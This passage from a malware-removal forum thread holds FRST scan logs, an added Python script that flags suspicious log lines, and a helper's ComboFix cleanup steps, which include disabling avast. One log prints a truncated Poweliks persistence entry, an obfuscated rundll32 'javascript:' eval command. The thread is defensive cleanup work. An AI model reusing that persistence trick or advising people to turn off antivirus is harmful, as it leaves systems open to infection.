    2013-11-19 22:58 - 2013-11-19 22:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 22:41 - 2013-11-19 22:41 - 00000000 ____D C:\Windows\system32\MpEngineStore
    2013-11-17 23:58 - 2012-02-03 10:03 - 00000884 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000Core.job
    2013-11-08 09:51 - 2013-11-08 09:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-11-02 02:01 - 2013-04-30 14:44 - 00001945 _____ C:\Windows\epplauncher.mif
    2013-11-02 02:01 - 2013-04-30 14:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
    2013-11-02 02:01 - 2013-04-30 14:41 - 00000000 ____D C:\Program Files\Microsoft Security Client

    Some content of TEMP:
    ====================
    C:\Users\Fabian Zayas\AppData\Local\Temp\uninst.exe


    ==================== Bamital & volsnap Check =================

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\SysWOW64\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe => MD5 is legit
    C:\Windows\SysWOW64\explorer.exe => MD5 is legit
    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe => MD5 is legit
    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
    ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64


    LastRegBack: 2013-11-10 00:03

    ==================== End Of Log ============================
     
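As an added example, not code from the original post or from FRST itself: a small Python triage script that reads FRST-style log lines like the ones above and flags the entries a helper looks at first (Winsock entries whose file is missing, a Firefox proxy pointing at the loopback address, service or driver entries with no image path or no company name, lines FRST itself marks ATTENTION, and orphaned "No File" entries). The sample lines are excerpted from the FRST.txt above; the severity labels, rule names and function names are the example's own, not FRST's.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

@dataclass
class Finding:
    severity: str  # "high", "medium" or "low" (labels chosen for this example)
    reason: str
    line: str

# Service/driver entry: status letter, start-type digit, name, then the image path
# (possibly empty), e.g. "R2 MsMpSvc; c:\...\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)"
SERVICE_RE = re.compile(r"^([RSU])(\d)\s+([^;]+);\s*(.*)$")
# Firefox manual HTTP proxy host, e.g. FF NetworkProxy: "http", "127.0.0.1"
FF_PROXY_RE = re.compile(r'^FF NetworkProxy:\s*"http",\s*"([^"]+)"')
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

# Constructed sample: lines excerpted from the FRST.txt posted above
SAMPLE_LOG = r"""
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
FF NetworkProxy: "http", "127.0.0.1"
FF NetworkProxy: "http_port", 58687
FF NetworkProxy: "type", 1
FF Plugin: @microsoft.com/GENUINE - disabled No File
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
R2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()
U4 eqcpqxgh;
U4 rgqxleuo;
ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64
"""

def analyze_line(line: str) -> Optional[Finding]:
    """Return at most one finding for a single FRST log line, most specific rule first."""
    line = line.strip()
    if not line:
        return None
    # A Winsock catalog entry whose library is gone breaks networking and is a
    # classic leftover of a removed LSP; FRST prints the expected path next to it.
    if line.startswith("Winsock:") and "File Not found" in line:
        return Finding("high", "Winsock LSP entry points to a missing file", line)
    # Browser traffic routed through a local listener: worth asking who set it.
    m = FF_PROXY_RE.match(line)
    if m and m.group(1) in LOOPBACK:
        return Finding("medium", "Firefox HTTP proxy set to the loopback address", line)
    m = SERVICE_RE.match(line)
    if m:
        _status, _start, name, rest = m.groups()
        if not rest:
            return Finding("medium", f"service/driver {name!r} has no image path", line)
        if rest.endswith("()"):
            return Finding("low", f"service/driver {name!r} has no company name", line)
        return None
    # FRST's own marker for entries it considers significant.
    if "ATTENTION" in line:
        return Finding("high", "line flagged ATTENTION by FRST", line)
    # Orphaned plugin/extension registrations: harmless clutter, but listed for cleanup.
    if line.endswith("No File"):
        return Finding("low", "entry references a file that no longer exists", line)
    return None

def triage(log_text: str) -> List[Finding]:
    """Run analyze_line over every line of an FRST log and collect the findings."""
    return [f for f in (analyze_line(raw) for raw in log_text.splitlines()) if f]

def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per severity so a reply can lead with the important ones."""
    counts = {"high": 0, "medium": 0, "low": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts

if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in sorted(results, key=lambda f: ["high", "medium", "low"].index(f.severity)):
        print(f"[{f.severity:6}] {f.reason}\n          {f.line}")
    print(summarize(results))
```

The script is deliberately stateless per line, so it can be piped a whole FRST.txt; the proxy rule only looks at the "http" host, so a deployment that legitimately uses a corporate proxy produces no finding, while the loopback case seen in the log above does.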
  16. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    Download the attached fixlist.txt to the same location as FRST (otherwise the fix won't work).

    Open FRST and click Fix. Attach that report for me after it is finished.



    1. Please download ComboFix by sUBs from here and save it to your Desktop.
    If you are unsure how ComboFix works please read this guide carefully.
    Note: ComboFix must be downloaded to your Desktop.

    --------------------------------------------------------------------
    2. Temporarily disable your AntiVirus program.
    If you are unsure how to do this, please read this or this instruction.

    Instructions on how to disable avast:
    • Right-click on the avast! icon in the lower right corner of the screen and choose Open Avast! User Interface.
    • In the window that opens on the top right corner, click Settings.
    • In the new window that opens, choose the option Troubleshooting, uncheck Enable avast! self-defense, and click OK.
    • Again, right-click on the avast! icon in the lower right corner of the screen and select avast! shield controls.
    • In the menu that appears, choose Disable Permanently. When you are prompted to turn off security, click Yes.

    Note: Do not forget to turn on this option after the cleaning.

    --------------------------------------------------------------------
    3. Run ComboFix. Click on I Agree!

    ComboFix will check if there is a newer version of ComboFix available.
    Click Yes if prompted to download.

    ComboFix will display DISCLAIMER OF WARRANTY ON SOFTWARE.
    Click Yes to allow ComboFix to continue.

    If Recovery Console is not installed, ComboFix will offer download & installation.
    Click Yes to allow ComboFix to install Recovery Console.
    Note: Do not mouse-click ComboFix's window while it is running.
    If you see a message like "Illegal operation attempted on a registry key that has been marked for deletion", just restart the computer once more.


    --------------------------------------------------------------------
    4. When the tool is finished, it will produce a log report for you (typical location: C:\ComboFix.txt).
    Attach the log report (ComboFix.txt) to the topic.



    Please download Farbar Service Scanner and run it on the computer with the issue.
    • Make sure the following options are checked:
      • Internet Services
      • Windows Firewall
      • System Restore
      • Security Center/Action Center
      • Windows Update
      • Windows Defender
    • Press "Scan".
    • It will create a log (FSS.txt) in the same directory the tool is run from.
    • Please copy and paste the log to your reply.

  17. Nigel79

    Nigel79 New Member

    Jan 4, 2015
    1
    0
    Wondering if this thread is closed; the last action was over a year ago. I'm experiencing enormous trouble with what looks like a corrupted iexplore.exe file; I ran FRST but don't know where to go from here. It looks like I need a fixlist.txt file, which obviously I have no clue about :(
    Any help would be highly appreciated.
    2 reports; 1) FRST report, 2) Addition.txt report:
    /////////////////////////////////////////////// (1) FRST
    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 03-01-2015 03
    Ran by NorMac (administrator) on LEVIATHON on 04-01-2015 09:03:29
    Running from C:\Users\NorMac\Downloads
    Loaded Profile: NorMac (Available profiles: NorMac)
    Platform: Windows 8 Pro (X64) OS Language: English (United States)
    Internet Explorer Version 10 (Default browser: FF)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Stardock Software, Inc) C:\Program Files (x86)\Stardock\Start8\Start8Srv.exe
    (Stardock Software, Inc) C:\Program Files (x86)\Stardock\Start8\Start8_64.exe
    (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
    (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
    (Microsoft Corporation) C:\Windows\System32\dasHost.exe
    (NETGEAR) C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
    (Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
    () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
    (WDC) C:\Program Files\Western Digital\WD SmartWare\WD Drive Manager\WDDMService.exe
    (Western Digital) C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe
    () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDFME\WDFME.exe
    (Western Digital ) C:\Program Files (x86)\Western Digital\WD SmartWare\WDRulesEngine.exe
    () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDSC.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
    (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
    (NETGEAR Inc.) C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenie.exe
    (Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
    (McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
    (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
    () C:\Program Files (x86)\NETGEAR Genie\bin\genie2_tray.exe
    (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
    (Microsoft Corporation) C:\Windows\splwow64.exe
    (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
    (Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE
    (Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
    (Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicatorCom.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\NAPSTAT.EXE
    (Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\NAPSTAT.EXE
    (Microsoft Corporation) C:\Windows\SysWOW64\wiaacmgr.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


    ==================== Registry (Whitelisted) ==================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
    HKLM-x32\...\Run: [WD Quick View] => C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe [5237256 2012-12-20] (Western Digital Technologies, Inc.)
    HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
    HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101584 2014-04-25] (Safer-Networking Ltd.)
    HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5226600 2014-12-20] (AVAST Software)
    HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-26] (Microsoft Corporation)
    HKLM-x32\...\Run: [Intuit SyncManager] => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe [623880 2008-09-09] (Intuit Inc. All rights reserved.)
    HKLM-x32\...\Run: [LTCM Client] => C:\Program Files (x86)\LTCM Client\ltcmClient.exe [2756864 2011-04-07] (Leader Technologies Inc.)
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
    HKLM-x32\...\Run: [] => [X]
    Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
    Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [HP Officejet Pro 8600 (NET)] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7780120 2014-12-19] (SUPERAntiSpyware)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [eFax 4.4] => C:\Program Files (x86)\eFax Messenger 4.4\J2GDllCmd.exe [95744 2012-08-29] (j2 Global Communications, Inc.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [cdloader] => C:\Users\NorMac\AppData\Roaming\mjusbsp\cdloader2.exe [51592 2014-07-04] (magicJack L.P.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [NETGEARGenie] => C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenie.exe [602880 2013-11-14] (NETGEAR Inc.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [4566984 2014-04-25] (Safer-Networking Ltd.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [EssentialPIM] => C:\Program Files (x86)\EssentialPIM\EssentialPIM.exe [17719664 2014-12-01] (Astonsoft)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7394584 2014-12-12] (Piriform Ltd)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Policies\Explorer: [NoInternetOpenWith] 1
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
    ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
    ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WDDMStatus.lnk
    ShortcutTarget: WDDMStatus.lnk -> C:\Program Files\Western Digital\WD SmartWare\WD Drive Manager\WDDMStatus.exe (Western Digital Technologies, Inc.)
    Startup: C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eFax 4.4.lnk
    ShortcutTarget: eFax 4.4.lnk -> C:\Program Files (x86)\eFax Messenger 4.4\J2GTray.exe (j2 Global Communications, Inc.)
    Startup: C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HMA Pro VPN 2.0.lnk
    ShortcutTarget: HMA Pro VPN 2.0.lnk -> C:\Program Files (x86)\HMA! Pro VPN\bin\HMA! Pro VPN.exe (Privax)
    Startup: C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Officejet Pro 8600 (Network).lnk
    ShortcutTarget: Monitor Ink Alerts - HP Officejet Pro 8600 (Network).lnk -> C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
    Startup: C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sidebar.lnk
    ShortcutTarget: Sidebar.lnk -> C:\Program Files\Windows Sidebar\sidebar.exe (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)
    BootExecute: autocheck autochk * sdnclean64.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    HKU\S-1-5-21-485173556-832918840-2370493585-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=AV01
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=AV01
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
    SearchScopes: HKLM-x32 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-485173556-832918840-2370493585-1000 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
    BHO: WinZip Courier BHO -> {A8FB70FA-0FDF-4601-9DC4-BFA1B357204F} -> C:\Program Files (x86)\WinZip Courier\wzwmcie64.dll (WinZip Computing, S.L.)
    BHO-x32: RealPlayer Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
    BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
    BHO-x32: WinZip Courier BHO -> {A8FB70FA-0FDF-4601-9DC4-BFA1B357204F} -> C:\Program Files (x86)\WinZip Courier\wzwmcie32.dll (WinZip Computing, S.L.)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
    Toolbar: HKLM-x32 - No Name - {41525333-0076-A76A-76A7-7A786E7484D7} - No File
    DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
    Handler-x32: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files (x86)\Intuit\QuickBooks 2009\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
    Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\WINDOWS\SysWOW64\mscoree.dll (Microsoft Corporation)

    FireFox:
    ========
    FF ProfilePath: C:\Users\NorMac\AppData\Roaming\Mozilla\Firefox\Profiles\p4jsu73l.default-1415307498372
    FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll ()
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll ()
    FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1202122.dll (Adobe Systems, Inc.)
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
    FF Plugin-x32: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files (x86)\Free Ride Games\npExentCtl.dll No File
    FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
    FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
    FF Plugin-x32: @real.com/nppl3260;version=16.0.3.51 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
    FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
    FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
    FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
    FF Plugin-x32: @real.com/nprpplugin;version=16.0.3.51 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
    FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
    FF Plugin-x32: @winzip.com/Winzip Courier -> C:\Program Files (x86)\WinZip Courier\npwzwmc.dll (WinZip Computing, S.L.)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
    FF Plugin-x32: www.exent.com/GameTreatWidget -> C:\Program Files (x86)\Free Ride Games\NPGameTreatPlugin.dll No File
    FF Plugin HKU\S-1-5-21-485173556-832918840-2370493585-1000: @citrixonline.com/appdetectorplugin -> C:\Users\NorMac\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
    FF Plugin HKU\S-1-5-21-485173556-832918840-2370493585-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\NorMac\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
    FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
    FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-05-01]
    FF HKLM-x32\...\Firefox\Extensions: [{74c841e3-b59f-479e-8d7a-e26a942a87c8}] - C:\Program Files (x86)\WinZip Courier\FFExt
    FF Extension: WinZip Courier - C:\Program Files (x86)\WinZip Courier\FFExt [2014-04-05]
    FF HKLM-x32\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
    FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
    FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-06-10]
    FF HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
    FF Extension: McAfee Security Scan Plus - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]

    Chrome:
    =======
    CHR Profile: C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Google Slides) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-11-16]
    CHR Extension: (Google Docs) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-16]
    CHR Extension: (Google Drive) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-16]
    CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-10]
    CHR Extension: (YouTube) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-16]
    CHR Extension: (Google Search) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-16]
    CHR Extension: (Google Sheets) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-11-16]
    CHR Extension: (Avast Online Security) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-08-08]
    CHR Extension: (WinZip Courier) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\ilckobikkmajlmhhdenkhonjkoaneclk [2014-05-28]
